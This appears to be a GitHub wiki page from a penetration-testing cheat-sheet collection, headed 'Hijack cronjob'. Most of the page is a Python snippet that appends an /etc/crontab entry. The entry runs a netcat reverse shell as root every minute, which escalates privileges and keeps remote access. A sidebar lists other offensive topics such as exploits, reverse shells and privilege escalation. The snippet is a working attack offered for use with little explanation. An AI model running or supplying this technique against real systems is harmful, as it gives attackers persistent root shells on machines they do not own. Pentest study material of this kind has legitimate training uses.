Skip to content

Hijack cronjob

lethanhtung01011980 edited this page Apr 23, 2020 · 3 revisions

Goal

  • TO have cron job to run something as root

Use python to add cron job

If os.py can execute as root, then EoP is done

  • shell = '''
  • * * * * * root rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc victim-ip 4444 >/tmp/f
  • '''
  • f = open( '/etc/crontab' , 'a' )
  • f.write(shell)
  • f.close()

Sidebar

0. COMMON exploits

1. Scan Info

1.2 Passive Gathering

1.3 Active Gathering

2. Pre-attack

2.2 File transfer

3. Get Reverse Shell

4. Exploits

4.2 Windows Exploits

4.3 Linux Exploits

4.4 Password crack

4.5 Buffer Overflow

4.6 Web attacks

6. Escalate Privilege

6.1 Escalate in Windows

6.2 Escalate in Linux

7. Access and further attacks

8. Port redirection and Tunnelling

9. Metasploit

10. Kali

11. Thirdparty scripts

Clone this wiki locally